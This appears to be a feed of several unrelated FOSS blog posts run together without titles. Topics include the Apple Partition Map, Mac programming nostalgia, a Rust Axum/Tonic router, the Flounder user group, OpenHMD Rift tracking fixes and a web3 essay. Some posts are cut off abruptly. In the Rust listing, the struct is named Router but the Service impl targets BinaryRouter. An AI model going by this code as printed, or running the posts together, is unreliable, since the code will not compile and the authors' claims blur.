The way all IBM PCs and compatibles worked from the introduction of MS-DOS 2.0 in 1983 until some time after 2005 was the Master Boot Record partitioning scheme. It was outrageously simple: of the first 512 byte sector of a disk, the first 446 bytes was for the bootstrapping code (the “boot sector”), the last 2 bytes were for the magic two bytes telling the BIOS this disk was bootable, and the other 64 bytes were four entries of 16 bytes, each describing a disk partition. The Wikipedia page is a good overview of what it all looks like. Since “four partitions should be enough for anybody” wasn’t going to last, DOS 3.2 introduced “extended partitions” which was just using one of those 4 partitions as another similar data structure that could point to more partitions.
In the 1980s (similar to today), the Macintosh was, of course, different. The Apple Partition Map is significantly more flexible than the MBR on PCs. For a start, you could have more than four partitions! You could actually have a lot more than four partitions, as the Apple Partition Map is a single 512-byte sector for each partition, and the partition map is itself a partition. Instead of being block 0 (like the MBR is), it actually starts at block 1, and is contiguous (The Driver Descriptor Record is what’s at block 0). So, once created, it’s hard to extend. Typically it’d be created as 64×512-byte entries, for 32kb… which turns out is actually about enough for anyone.
The Inside Macintosh reference on the SCSI Manager goes through more detail as to these structures. If you’re wondering what language all the coding examples are in, it’s Pascal – which was fairly popular for writing Macintosh applications in back in the day.
But the actual partition map isn’t the “interesting” part of all this (and yes, the quotation marks are significant here), because Macs are pretty darn finicky about what disks to boot off, which gets to be interesting if you’re trying to find a CD-ROM image on the internet from which to boot, and then use to install an Operating System from.
… the preferred programming language changes.
I never programmed a 1980s Macintosh actually in the 1980s. It was sometime in the early 1990s that I first experienced Microsoft Basic for the Macintosh. I’d previously (unknowingly at the time as it was branded Commodore) experienced Microsoft BASIC on the Commodore 16, Commodore 64, and even the Apple ][, but the Macintosh version was something else. It let you do some pretty neat things such as construct a GUI with largely the same amount of effort as it took to construct a Text based UI on the micros I was familiar with.
Okay, to be fair, I’d also dabbled in Microsoft QBasic that came bundled with MS-DOS of the era, which let you do a whole bunch of graphics – so you could theoretically construct a GUI with it. Something I did attempt to do. Programming on the Mac was so much easier to construct a GUI.
Of course, Microsoft Basic wasn’t the preferred way to program on the Macintosh. At that time it was largely Pascal, with C being something that also existed – but you were going to see Pascal in Inside Macintosh. It was probably somewhat fortuitous that I’d poked at Pascal a bit as something alternate to look at in the high school computing classes. I can only remember using TurboPascal on DOS systems and never actually writing Pascal on the Macintosh.
By the middle part of the 1990s though, I was firmly incompetently writing C on the Mac. No doubt the quality of my code increased after I’d done some university courses actually covering the language rather than the only practical way I had to attempt to write anything useful being looking at Inside Macintosh examples in Pascal and “C for Dummies” which was very not-Macintosh. Writing C on UNIX/Linux was a lot easier – everything was made for it, including Actual Documentation!
Anyway, in the early 2000s I ran MacOS X for a bit on my white iBook G3, and did a (very) small amount of any GUI / Project Builder (the precursor to Xcode) related development – instead largely focusing on command line / X11 things. The latest coolness being to use Objective-C to program applications (unless you were bringing over your Classic MacOS Carbon based application, then you could still write C). Enter some (incompetent) Objective-C coding!
Then Apple went to x86, so the hardware ceased being interesting, and I had no reason to poke at it even as a side effect of having hardware that could run the software stack. Enter a long-ass time of Debian, Ubuntu, and Fedora on laptops.
Come 2022 though, and (for reasons I should really write up), I’m poking at a Mac again and it’s now Swift as the preferred way to write apps. So, I’m (incompetently) hacking away at Swift code. I have to admit, it’s pretty nice. I’ve managed to be somewhat productive in a relative short amount of time, and all the affordances in the language gear towards the kind of safety that is a PITA when coding in C.
So this is my WIP utility to be able to import photos from a Shotwell database into the macOS Photos app:
There’s a lot of rough edges and unknowns left, including how to actually do the import (it looks like there’s going to be Swift code doing AppleScript things as the PhotoKit API is inadequate). But hey, some incompetent hacking in not too much time has a kind-of photo browser thing going on that feels pretty snappy.
Recently I read Michael Snoyman’s post on combining Axum, Hyper, Tonic and Tower. While his solution worked, it irked me – it seemed like there should be a much tighter solution possible.
I can deep dive into the code in a later post perhaps, but I think there are four points of difference. One, since the post was written Axum has started boxing its routes : so the enum dispatch approach taken, which delivers low overheads actually has no benefits today.
Two, while writing out the entire type by hand has some benefits, async code is much more pithy.
Thirdly, the code in the post is entirely generic, except the routing function itself.
And fourth, the outer Service<AddrStream> is an unnecessary layer to abstract over: given the similar constraints – the inner Service must take Request<..>, it is possible to just not use a couple of helpers and instead work directly with Service<Request...>.
So, onto a pithier version.
First, the app server code itself.
use std::{convert::Infallible, net::SocketAddr};
use axum::routing::get;
use hyper::{server::conn::AddrStream, service::make_service_fn};
use hyper::{Body, Request};
use tonic::async_trait;
use demo::echo_server::{Echo, EchoServer};
use demo::{EchoReply, EchoRequest};
struct MyEcho;
#[async_trait]
impl Echo for MyEcho {
async fn echo(
&self,
request: tonic::Request<EchoRequest>,
) -> Result<tonic::Response<EchoReply>, tonic::Status> {
Ok(tonic::Response::new(EchoReply {
message: format!("Echoing back: {}", request.get_ref().message),
}))
}
}
#[tokio::main]
async fn main() {
let addr = SocketAddr::from(([0, 0, 0, 0], 3000));
let axum_service = axum::Router::new().route("/", get(|| async { "Hello world!" }));
let grpc_service = tonic::transport::Server::builder()
.add_service(EchoServer::new(MyEcho))
.into_service();
let both_service =
demo_router::Router::new(axum_service, grpc_service, |req: &Request<Body>| {
Ok::<bool, Infallible>(
req.headers().get("content-type").map(|x| x.as_bytes())
== Some(b"application/grpc"),
)
});
let make_service = make_service_fn(move |_conn: &AddrStream| {
let both_service = both_service.clone();
async { Ok::<_, Infallible>(both_service) }
});
let server = hyper::Server::bind(&addr).serve(make_service);
if let Err(e) = server.await {
eprintln!("server error: {}", e);
}
}
Note the Router: it takes the two services and Fn to determine which to use on any given request. Then we just drop that composed service into make_service_fn and we’re done.
Next up we have the Router implementation. This is generic across any two Service<Request<...>> types as long as they are both Into<Bytes> for their Data, and Into<Box<dyn Error>> for errors.
use std::{future::Future, pin::Pin, task::Poll};
use http_body::combinators::UnsyncBoxBody;
use hyper::{body::HttpBody, Body, Request, Response};
use tower::Service;
#[derive(Clone)]
pub struct Router<First, Second, F> {
first: First,
second: Second,
discriminator: F,
}
impl<First, Second, F> Router<First, Second, F> {
pub fn new(first: First, second: Second, discriminator: F) -> Self {
Self {
first,
second,
discriminator,
}
}
}
impl<First, Second, FirstBody, FirstBodyError, SecondBody, SecondBodyError, F, FErr>
Service<Request<Body>> for BinaryRouter<First, Second, F>
where
First: Service<Request<Body>, Response = Response<FirstBody>>,
First::Error: Into<Box<dyn std::error::Error + Send + Sync>> + 'static,
First::Future: Send + 'static,
First::Response: 'static,
Second: Service<Request<Body>, Response = Response<SecondBody>>,
Second::Error: Into<Box<dyn std::error::Error + Send + Sync>> + 'static,
Second::Future: Send + 'static,
Second::Response: 'static,
F: Fn(&Request<Body>) -> Result<bool, FErr>,
FErr: Into<Box<dyn std::error::Error + Send + Sync>> + Send + 'static,
FirstBody: HttpBody<Error = FirstBodyError> + Send + 'static,
FirstBody::Data: Into<bytes::Bytes>,
FirstBodyError: Into<Box<dyn std::error::Error + Send + Sync>> + 'static,
SecondBody: HttpBody<Error = SecondBodyError> + Send + 'static,
SecondBody::Data: Into<bytes::Bytes>,
SecondBodyError: Into<Box<dyn std::error::Error + Send + Sync>> + 'static,
{
type Response = Response<
UnsyncBoxBody<
<hyper::Body as HttpBody>::Data,
Box<dyn std::error::Error + Send + Sync + 'static>,
>,
>;
type Error = Box<dyn std::error::Error + Send + Sync + 'static>;
type Future =
Pin<Box<dyn Future<Output = Result<Self::Response, Self::Error>> + Send + 'static>>;
fn poll_ready(
&mut self,
cx: &mut std::task::Context<'_>,
) -> std::task::Poll<Result<(), Self::Error>> {
match self.first.poll_ready(cx) {
Poll::Ready(Ok(())) => match self.second.poll_ready(cx) {
Poll::Ready(Ok(())) => Poll::Ready(Ok(())),
Poll::Ready(Err(e)) => Poll::Ready(Err(e.into())),
Poll::Pending => Poll::Pending,
},
Poll::Ready(Err(e)) => Poll::Ready(Err(e.into())),
Poll::Pending => Poll::Pending,
}
}
fn call(&mut self, req: Request<Body>) -> Self::Future {
let discriminant = { (self.discriminator)(&req) };
let (first, second) = if matches!(discriminant, Ok(false)) {
(Some(self.first.call(req)), None)
} else if matches!(discriminant, Ok(true)) {
(None, Some(self.second.call(req)))
} else {
(None, None)
};
let f = async {
Ok(match discriminant.map_err(Into::into)? {
true => second
.unwrap()
.await
.map_err(Into::into)?
.map(|b| b.map_data(Into::into).map_err(Into::into).boxed_unsync()),
false => first
.unwrap()
.await
.map_err(Into::into)?
.map(|b| b.map_data(Into::into).map_err(Into::into).boxed_unsync()),
})
};
Box::pin(f)
}
}
Interesting things here – I use boxed_unsync to abstract over the body concrete type, and I implement the future using async code rather than as a separate struct. It becomes much smaller even after a few bits of extra type constraining.
One thing that flummoxed me for a little was the need to capture the future for the underlying response outside of the async block. Failing to do so provokes a 'static requirement which was tricky to debug. Fortunately there is a bug on making this easier to diagnose in rustc already. The underlying problem is that if you create the async block, and then dereference self, the type for impl of .first has to live an arbitrary time. Whereas by capturing the future immediately, only the impl of the future has to live an arbitrary time, and that doesn’t then require changing the signature of the function.
This is almost worth turning into a crate – I couldn’t see an existing one when I looked, though it does end up rather small – < 100 lines. What do you all think?
The first meeting will start at 1PM Australian Eastern time (Melbourne/Sydney) which is +1100 on Saturday the 5th of February.
I will start the video chat an hour early in case someone makes a timezone mistake and gets there an hour before it starts. If anyone else joins early we will have random chat until the start time (deliberately avoiding topics worthy of the main meeting). The link http://b.coker.com.au will redirect to the meeting URL on the day.
The first scheduled talk is a summary and discussion of free software related news. Anyone who knows of something new that excites them is welcome to speak about it.
The main event is discussion of storage technology and hands-on training on BTRFS and ZFS for those who are interested. Here are the ZFS training notes and here are the BTRFS training notes. Feel free to do the training exercises on your own VM before the meeting if you wish.
Then discussion of the future of the group and the use of FOSS social media. While social media is never going to be compulsory some people will want to use it to communicate and we could run some servers for software that is considered good (lots of server capacity is available).
Finally we have to plan future meetings and decide on which communication methods are desired.
The BBB instance to be used for the video conference is sponsored by NZOSS and Catalyst Cloud.
Since PM Scott Morrison did not announce the federal election date last week, it will now be held somewhere between March and May (see the post from ABC’s Antony Green for details). Various aspects of elections are covered in the Civics & Citizenship Australian Curriculum in Years 4, 5 and 6. Students are interested in […]
The post Covering the federal election, before the election first appeared on OpenSTEM Pty Ltd.Flounder is a new free software users group based in the Australia/NZ area. Flounder stands for FLOSS (Free Libre Open Source Software) down under.
Here is my blog post describing the initial idea, the comment from d3Xt3r suggested the name. Flounder is a group of fish that has species native to Australia and NZ.
The main aim is to provide educational benefits to free software users via an online meeting that can’t be obtained by watching YouTube videos etc in a scope that is larger than one country. When the pandemic ends we will keep running this as there are benefits to be obtained from a meeting of a wide geographic scope that can’t be obtained by meetings in a single city. People from other countries are welcome to attend but they aren’t the focus of the meeting.
Until we get a better DNS name the address http://b.coker.com.au will redirect to the BBB instance used for online meetings (the meeting address isn’t yet setup so it redirects to the blog). The aim is that there will always be a short URL for the meeting so anyone who has one device lose contact can quickly type the URL into their backup device.
The first meeting will be on the 5th of Feb 2022 at 1PM Melbourne time +1100. When we get a proper domain I’ll publish a URL for an iCal file with entries for all meetings. I will also find some suitable way for meeting times to be localised (I’m sure there’s a WordPress plugin for that).
For the hands-on part of the meetings there will be virtual machine images you can download to run on your own system (tested with KVM, should work with other VM systems) and the possibility of logging in to a running VM. The demonstration VMs will have public IPv6 addresses and will also be available through different ports on a single IPv4 address, having IPv6 on your workstation will be convenient for you but you can survive without it.
Linux Australia has a list of LUGs in Australia, is there a similar list for NZ? One thing I’d like to see is a list of links for iCal files for all the meetings and also an iCal aggregator that for all iCal feeds of online meetings. I’ll host it myself if necessary, but it’s probably best to do it via Linux Australia (Linux Australasia?) if possible.
I’m attending the https://linux.conf.au/ conference online this weekend, which is always a good opportunity for some sideline hacking.
I found something boneheaded doing that today.
There have been a few times while inventing the OpenHMD Rift driver where I’ve noticed something strange and followed the thread until it made sense. Sometimes that leads to improvements in the driver, sometimes not.
In this case, I wanted to generate a graph of how long the computer vision processing takes – from the moment each camera frame is captured until poses are generated for each device.
To do that, I have a some logging branches that output JSON events to log files and I write scripts to process those. I used that data and produced:
Two things caught my eye in this graph. The first is the way the baseline latency (pink lines) increases from ~20ms to ~58ms. The 2nd is the quantisation effect, where pose latencies are clearly moving in discrete steps.
Neither of those should be happening.
Camera frames are being captured from the CV1 sensors every 19.2ms, and it takes that 17-18ms for them to be delivered across the USB. Depending on how many IR sources the cameras can see, figuring out the device poses can take a different amount of time, but the baseline should always hover around 17-18ms because the fast “device tracking locked” case take as little as 1ms.
Did you see me mention 19.2ms as the interframe period? Guess what the spacing on those quantisation levels are in the graph? I recognised it as implying that something in the processing is tied to frame timing when it should not be.
This 2nd graph helped me pinpoint what exactly was going on. This graph is cut from the part of the session where the latency has jumped up. What it shows is a ~1 frame delay between when the frame is received (frame-arrival-finish-local-ts) before the initial analysis even starts!
That could imply that the analysis thread is just busy processing the previous frame and doesn’t get start working on the new one yet – but the graph says that fast analysis is typically done in 1-10ms at most. It should rarely be busy when the next frame arrives.
This is where I found the bone headed code – a rookie mistake I wrote when putting in place the image analysis threads early on in the driver development and never noticed.
There are 3 threads involved:
These 3 threads communicate using frame worker queues passing frames between each other. Each analysis thread does this pseudocode:
while driver_running:
Pop a frame from the queue
Process the frame
Sleep for new frame notification
The problem is in the 3rd line. If the driver is ever still processing the frame in line 2 when a new frame arrives – say because the computer got really busy – the thread sleeps anyway and won’t wake up until the next frame arrives. At that point, there’ll be 2 frames in the queue, but it only still processes one – so the analysis gains a 1 frame latency from that point on. If it happens a second time, it gets later by another frame! Any further and it starts reclaiming frames from the queues to keep the video capture thread fed – but it only reclaims one frame at a time, so the latency remains!
The fix is simple:
while driver_running:
Pop a frame
Process the frame
if queue_is_empty():
sleep for new frame notification
Doing that for both the fast and long analysis threads changed the profile of the pose latency graph completely.
This is a massive win! To be clear, this has been causing problems in the driver for at least 18 months but was never obvious from the logs alone. A single good graph is worth a thousand logs.
What does this mean in practice?
The way the fusion filter I’ve built works, in between pose updates from the cameras, the position and orientation of each device are predicted / updated using the accelerometer and gyro readings. Particularly for position, using the IMU for prediction drifts fairly quickly. The longer the driver spends ‘coasting’ on the IMU, the less accurate the position tracking is. So, the sooner the driver can get a correction from the camera to the fusion filter the less drift we’ll get – especially under fast motion. Particularly for the hand controllers that get waved around.
Poses are now being updated up to 40ms earlier and the baseline is consistent with the USB transfer delay.
You can also visibly see the effect of the JPEG decoding support I added over Christmas. The ‘red’ camera is directly connected to USB3, while the ‘khaki’ camera is feeding JPEG frames over USB2 that then need to be decoded, adding a few ms delay.
The latency reduction is nicely visible in the pose graphs, where the ‘drop shadow’ effect of pose updates tailing fusion predictions largely disappears and there are fewer large gaps in the pose observations when long analysis happens (visible as straight lines jumping from point to point in the trace):
Yes, the blog is still on. January 2004 I moved to WordPress, and it is still here January 2022. I didn’t write much last year (neither here, not experimenting with the Hey blog). I didn’t post anything to Instagram last year either from what I can tell, just a lot of stories.
August 16 2021, I realised I was 1,000 days till May 12 2024, which is when I become 40. As of today, that leads 850 days. Did I squander the last 150 days? I’m back to writing almost daily in the Hobonichi Techo (I think last year and the year before were mostly washouts; I barely scribbled anything offline).
I got a new Apple Watch Series 7 yesterday. I can say I used the Series 4 well (79% battery life), purchased in the UK when I broke my Series 0 in Edinburgh airport.
TripIt stats for last year claimed 95 days on the road. This is of course, a massive joke, but I’m glad I did get to visit London, Lisbon, New York, San Francisco, Los Angeles without issue. I spent a lot of time in Kuantan, a bunch of Langkawi trips, and also, I stayed for many months at the Grand Hyatt Kuala Lumpur during the May lockdowns (I practically stayed there all lockdown).
With 850 days to go till I’m 40, I have plenty I would like to achieve. I think I’ll write a lot more here. And elsewhere. Get back into the habit of doing. And publishing by learning and doing. No fear. Not that I wasn’t doing, but its time to be prolific with what’s been going on.
Blockchain. Cryptocurrency. Ethereum. NFTs. DAOs. Smart Contracts. web3. It’s impossible to avoid the blockchain hype machine these days, but it’s often just as difficult to decipher what it all means.
On top of that, discourse around web3 is extremely polarising: everyone involved is very keen to a) pick a team, and b) get you to join their team. If you haven’t picked a team, you must be secretly with the other team.
Max Read made a compelling argument that the web3 debate is in fact two different debates:
But, OK, what is the root disagreement, exactly? The way I read it there are two broad “is web3 bullshit?” debates, not just one, centered around the following questions:
Can the blockchain do anything that other currently existing technology cannot do and/or do anything better or more efficiently than other currently existing technology?
Will the blockchain form the architecture of the internet of the future (i.e. “web3”), and/or will blockchain-native companies and organizations become important and powerful?
Max Read — Is web3 bullshit?
I’m inclined to agree with Max’s analysis here: there’s a technical question, and there’s a business/cultural question. It’s hard to separate the two when every day sees new headlines about millions of dollars being stolen or scammed; or thousands of people putting millions of dollars into highly optimistic ventures. There are extreme positives and extreme negatives happening all the time in the web3 world.
With that in mind, I want to take a step back from the day-to-day excitement of cryptocurrency and web3, and look at some of the driving philosophies espoused by the movement.
There are a lot of differing viewpoints on web3, every individual has a slightly different take on it. There are three broad themes that stand out, however.
Blockchain-based technology is inherently distributed (with some esoteric caveats, but we can safely ignore them for now). In a world where the web centres around a handful of major services, where we’ve seen the harm that the likes of Facebook and YouTube can inflict on society, it’s not surprising that decentralisation would be a powerful theme drawing in anyone looking for an alternative.
Decentralisation isn’t new to the Internet, of course: it’s right there in the name. This giant set of “interconnected networks” has been decentralised from the very beginning. It’s not perfect, of course: oppressive governments can take control of the borders of their portion of the Internet, and we’ve come to rely on a handful of web services to handle the trickier parts of using the web. But fundamentally, that decentralised architecture is still there. I can still set up a web site hosted on my home computer, which anyone in the world could access.
I don’t do that, however, for the same reason that web3 isn’t immune from centralised services: Centralisation is convenient. Just as we have Facebook, or Google, or Amazon as giant centralised services on the current web, we can already see similar services appearing for web3. For payments, Coinbase has established itself as a hugely popular place exchange cryptocurrencies and traditional currencies. For NFTs, OpenSea is the service where you’ll find nearly every NFT collection. MetaMask keeps all of your crypto-based keys, tokens, and logins in a single “crypto wallet”.
Centralisation is convenient.
While web3 proponents give a lot of credence to the decentralised nature of cryptocurrency being a driver of popularity, I’m not so sure. At best, I’m inclined to think that decentralisation is table stakes these days: you can’t even get started as a global movement without a strong commitment to decentralisation.
But if decentralisation isn’t the key, what is?
When we talk about ownership in web3, NFTs are clearly the flavour of the month, but recent research indicates that the entire NFT market is massively artificially inflated.
Analysis of 6.1 million trades of 4.7 million NFTs shows that the top 10% of traders have traded 97% of NFTs which definitely puts meat on the bones of the hypothesis that a lot of NFT trades are wash sales intended to artificially boost prices. https://t.co/ufgmhE2iBi
— Dare Obasanjo(@Carnage4Life) November 30, 2021
Rather than taking pot-shots at the NFT straw man, I think it’s more interesting to look at the idea of ownership in terms of attribution. The more powerful element of this philosophy isn’t about who owns something, it’s who created it. NFTs do something rather novel with attribution, allowing royalty payments to the original artist every time an NFT is resold. I love this aspect: royalties shouldn’t just be for movie stars, they should be for everyone.
Comparing that to the current web, take the 3 paragraphs written by Max Read that I quoted above. I was certainly under no technical obligation to show that it was a quote, to attribute it to him, or to link to the source. In fact, it would have been easier for me to just paste his words into this post, and pretend they were my own. I didn’t, of course, because I feel an ethical obligation to properly attribute the quote.
In a world where unethical actors will automatically copy/paste your content for SEO juice (indeed, I expect this blog post to show up on a bunch of these kinds of sites); where massive corporations will consume everything they can find about you, in order to advertise more effectively to you, it’s not at all surprising that people are looking for a technical solution for taking back control of their data, and for being properly attributed for their creations.
The interesting element of this philosophy isn’t about who owns something, it’s who created it.
That’s not to say that existing services discourage attribution: a core function of Twitter is retweets, a core function of Tumblr is reblogging. WordPress still supports trackbacks, even if many folks turn them off these days.
These are all blunt instruments, though, aimed at attributing an entire piece, rather than a more targeted approach. What I’d really like is a way to easily quote and attribute a small chunk of a post: 3 paragraphs (or blocks, if you want to see where I’m heading 
), inserted into my post, linking back to where I got them from. If someone chooses to quote some of this post, I’d love to receive a pingback just for that quote, so it can be seen in the right context.
The functionality provide by Twitter and Tumblr is less of a technologically-based enforcement of attribution, and more of an example of paving the cow path: by and large, people want to properly attribute others, providing the tools to do so can easily become a fundamental part of how any software is used.
These tools only work so long as there’s an incentive to use them, however. web3 certainly provides the tools to attribute others, but much like SEO scammers copy/pasting blog posts, the economics of the NFT bubble is clearly a huge incentive to ignore those tools and ethical obligations, to the point that existing services have had to build additional features just to detect this abuse.
With every major blockchain also being a cryptocurrency, monetisation is at the heart of the entire web3 movement. Every level of the web3 tech stack involves a cryptocurrency-based protocol. This naturally permeates through the entire web3 ecosystem, where money becomes a major driving factor for every web3-based project.
And so, it’s impossible to look at web3 applications without also considering the financial aspect. When you have to pay just to participate, you have to ask whether every piece of content you create is “worth it”.
Again, let’s go back to the 3 paragraphs I quote above. In a theoretical web3 world, I’d publish this post on a blockchain in some form or another, and that act would also likely include noting that I’d quoted 3 blocks of text attributed to Max Read. I’d potentially pay some amount of money to Max, along with the fees that every blockchain charges in order to perform a transaction. While this process is potentially helpful to the original author at a first glance, I suspect the second and third order effects will be problematic. Having only just clicked the Publish button a few seconds earlier, I’m already some indeterminate amount of money out of pocket. Which brings me back to the question, is this post “worth it”? Will enough people tip/quote/remix/whatever me, to cover the cost of publishing? When every creative work must be viewed through a lens of financial impact, it fundamentally alters that creative process.
When you have to pay just to participate, you have to ask whether every piece of content you create is “worth it”.
Ultimately, we live in a capitalist society, and everyone deserves the opportunity to profit off their work. But by baking monetisation into the underlying infrastructure of web3, it becomes impossible to opt-out. You either have the money to participate without being concerned about the cost, or you’re going to need to weigh up every interaction by whether or not you can afford it.
After breaking it all down, we can see that it’s not all black-and-white. There are some positive parts of web3, and some negative parts. Not that different to the web of today, in fact. 
That’s not to say that either approach is the correct one: instead, we should be looking to learn from both, and produce something better.
I’ve long been a proponent of leveraging the massive install base of WordPress to provide distributed services to anyone. Years ago, I spoke about an idea called “Connected WordPress” that would do exactly that. While the idea didn’t gain a huge amount of traction at the time, the DNA of the Connected WordPress concept shares a lot of similar traits to the decentralised nature of web3.
I’m a big fan of decentralised technologies as a way for individuals to claw back power over their own data from the governments and massive corporations that would prefer to keep it all centralised, and I absolutely think we should be exploring ways to make the existing web more resistant to censorship.
At the same time, we have to acknowledge that there are certainly benefits to centralisation. As long as people have the freedom to choose how and where they participate, and centralised services are required to play nicely with self hosted sites, is there a practical difference?
I quite like how Solid allows you have it both ways, whilst maintaining control over your own data.
Here’s the thing about attribution: you can’t enforce it with technology alone. Snapchat have indirectly demonstrated exactly this problem: in order to not lose a message, people would screenshot or record the message on their phone. In response, Snapchat implemented a feature to notify the other party when you screenshot a message from them. To avoid this, people will now use a second phone to take a photo or video of the message. While this example isn’t specifically about attribution, it demonstrates the problem that there’s no way to technologically restrict how someone interacts with content that you’ve published, once they’ve been granted access.
Instead of worrying about technical restrictions, then, we should be looking at how attribution can be made easier.
IndieWeb is a great example of how this can be done in a totally decentralised fashion.
I’m firmly of the opinion that monetisation of the things you create should be opt-in, rather than opt-out.
Modern society is currently obsessed with monetising everything, however. It comes in many different forms: hustle culture, side gigs, transforming hobbies into businesses, meme stocks, and cryptocurrencies: they’re all symptoms of this obsession.
I would argue that, rather than accepting as fait accompli that the next iteration of the web will be monetised to the core, we should be pushing back against this approach. Fundamentally, we should be looking to build for a post scarcity society, rather than trying to introduce scarcity where there previously was none.
While we work towards that future, we should certainly be easier for folks to monetise their work, but the current raft of cryptocurrencies just aren’t up to the task of operating as… currencies.
Well, that depends on what your priorities are. The conversations around web3 are taking up a lot of air right now, so it’s possible to get the impression web3 will be imminently replacing everything. It’s important to keep perspective on this, though. While there’s a lot of money in the web3 ecosystem right now, it’s dwarfed by the sheer size of the existing web.
If you’re excited about the hot new tech, and feeling inspired by the ideas espoused in web3 circles? Jump right in! I’m certain you’ll find something interesting to work on.
Always wanted to get into currency speculation, but didn’t want to deal with all those pesky “regulations” and “safeguards”? Boy howdy, are cryptocurrencies or NFTs the place for you. (Please don’t pretend that this paragraph is investment advice, it is nothing of the sort.)
Want to continue building stuff on the web, and you’re willing to learn new things when you need them, but are otherwise happy with your trajectory? Just keep on doing what you’re doing. Even if web3 does manage to live up to the hype, it’ll take a long time for it to be adopted by the mainstream. You’ll have years to adapt.
There are some big promises associated with web3, many of which sound very similar to the promises that were made around web 2.0, particularly around open APIs, and global interoperability. We saw what happened when those kinds of tools go wrong, and web3 doesn’t really solve those problems. It may exacerbate them in some ways, since it’s impossible to delete your data from a blockchain.
That said, (and I say this as a WordPress Core developer), just because a particular piece of software is not the optimal technical solution doesn’t mean it won’t become the most popular. Market forces can be a far stronger factor that technical superiority. There are many legitimate complaints about blockchain (including performance, bloat, fit for purpose, and security) that have been levelled against WordPress in the past, but WordPress certainly isn’t slowing down. I’m not even close to convinced that blockchain is the right technology to base the web on, but I’ve been doing this for too long to bet everything against it.
Markets can remain irrational a lot longer than you and I can remain solvent.
—A. Gary Shilling
As for me, well… 
I remain sceptical of web3 as it’s currently defined, but I think there’s room to change it, and to adopt the best bits into the existing web. Web 1.0 didn’t magically disappear when Web 2.0 rolled in, it adapted. Maybe we’ll look back in 10 years and say this was a time when the web fundamentally changed. Or, maybe we’ll refer to blockchain in the same breath as pets.com, and other examples from the dotcom boom of the 1990’s.
The Net interprets censorship as damage and routes around it.
—John Gilmore
This quote was originally referring to Usenet, but it’s stayed highly relevant in the decades since. I think it applies here, too: if the artificial scarcity built into web3 behaves too much like censorship, preventing people from sharing what they want to share, the internet (or, more accurately, the billions of people who interact with the internet) will just… go around it. It won’t all be smooth sailing, but we’ll continue to experiment, evolve, and adapt as it changes.
Personally, I think now is a great time for us to be embracing the values and ideals of projects like Solid, and IndieWeb. Before web3 referred to blockchains, it was more commonly used in reference to the Semantic Web, which is far more in line with WordPress’ ideals, whilst also matching many of the values prioritised by the new web3. As a major driver of the Open Web, WordPress can help people own their content in a sustainable way, engage with others on their own terms, and build communities that don’t depend on massive corporations or hand-wavy magical tech solutions.
Don’t get too caught up in the drama of whatever is the flavour of the month. I’m optimistic about the long term resilience of the internet, and I think you should be, too. 
Once again time has passed, and another update on Oculus Rift support feels due! As always, it feels like I’ve been busy with work and not found enough time for Rift CV1 hacking. Nevertheless, looking back over the history since I last wrote, there’s quite a lot to tell!
In general, the controller tracking is now really good most of the time. Like, wildly-swing-your-arms-and-not-lose-track levels (most of the time). The problems I’m hunting now are intermittent and hard to identify in the moment while using the headset – hence my enthusiasm over the last updates for implementing stream recording and a simulation setup. I’ll get back to that.
Since I last wrote, the tracking improvements have mostly come from identifying and rejecting incorrect measurements. That is, if I have 2 sensors active and 1 sensor says the left controller is in one place, but the 2nd sensor says it’s somewhere else, we’ll reject one of those – choosing the pose that best matches what we already know about the controller. The last known position, the gravity direction the IMU is detecting, and the last known orientation. The tracker will now also reject observations for a time if (for example) the reported orientation is outside the range we expect. The IMU gyroscope can track the orientation of a device for quite a while, so can be relied on to identify strong pose priors once we’ve integrated a few camera observations to get the yaw correct.
It works really well, but I think improving this area is still where most future refinements will come. That and avoiding incorrect pose extractions in the first place.
The above plot is a sample of headset tracking, showing the extracted poses from the computer vision vs the pose priors / tracking from the Kalman filter. As you can see, there are excursions in both position and orientation detected from the video, but these are largely ignored by the filter, producing a steadier result.
This plot shows the left controller being tracked during a Beat Saber session. The controller tracking plot is quite different, because controllers move a lot more than the headset, and have fewer LEDs to track against. There are larger gaps here in the timeline while the vision re-acquires the device – and in those gaps you can see the Kalman filter interpolating using IMU input only (sometimes well, sometimes less so).
Another nice thing I did is changes in the way the search for a tracked device is made in a video frame. Before starting looking for a particular device it always now gets the latest estimate of the previous device position from the fusion filter. Previously, it would use the estimate of the device pose as it was when the camera exposure happened – but between then and the moment we start analysis more IMU observations and other camera observations might arrive and be integrated into the filter, which will have updated the estimate of where the device was in the frame.
This is the bit where I think the Kalman filter is particularly clever: Estimates of the device position at an earlier or later exposure can improve and refine the filter’s estimate of where the device was when the camera captured the frame we’re currently analysing! So clever. That mechanism (lagged state tracking) is what allows the filter to integrate past tracking observations once the analysis is done – so even if the video frame search take 150ms (for example), it will correct the filter’s estimate of where the device was 150ms in the past, which ripples through and corrects the estimate of where the device is now.
To improve the identification of devices better, I measured the actual angle from which LEDs are visible (about 75 degrees off axis) and measured the size. The pose matching now has a better idea of which LEDs should be visible for a proposed orientation and what pixel size we expect them to have at a particular distance.
I fixed a bug in the output pose smoothing filter where it would glitch as you turned completely around and crossed the point where the angle jumps from +pi to -pi or vice versa.
I got a wide-angle hi-res webcam and took photos of a checkerboard pattern through the lens of my headset, then used OpenCV and panotools to calculate new distortion and chromatic aberration parameters for the display. For me, this has greatly improved. I’m waiting to hear if that’s true for everyone, or if I’ve just fixed it for my headset.
Config blocks! A long time ago, I prototyped code to create a persistent OpenHMD configuration file store in ~/.config/openhmd. The rift-kalman-filter branch now uses that to store the configuration blocks that it reads from the controllers. The first time a controller is seen, it will load the JSON calibration block as before, but it will now store it in that directory – removing a multiple second radio read process on every subsequent startup.
To go along with that, I have an experimental rift-room-config branch that creates a rift-room-config.json file and stores the camera positions after the first startup. I haven’t pushed that to the rift-kalman-filter branch yet, because I’m a bit worried it’ll cause surprising problems for people. If the initial estimate of the headset pose is wrong, the code will back-project the wrong positions for the cameras, which will get written to the file and cause every subsequent run of OpenHMD to generate bad tracking until the file is removed. The goal is to have a loop that monitors whether the camera positions seem stable based on the tracking reports, and to use averaging and resetting to correct them if not – or at least to warn the user that they should re-run some (non-existent) setup utility.
The final big ticket item was a rewrite of how the USB video frame capture thread collects pixels and passes them to the analysis threads. This now does less work in the USB thread, so misses fewer frames, and also I made it so that every frame is now searched for LEDs and blob identities tracked with motion vectors, even when no further analysis will be done on that frame. That means that when we’re running late, it better preserves LED blob identities until the analysis threads can catch up – increasing the chances of having known LEDs to directly find device positions and avoid searching. This rewrite also opened up a path to easily support JPEG decode – which is needed to support Rift Sensors connected on USB 2.0 ports.
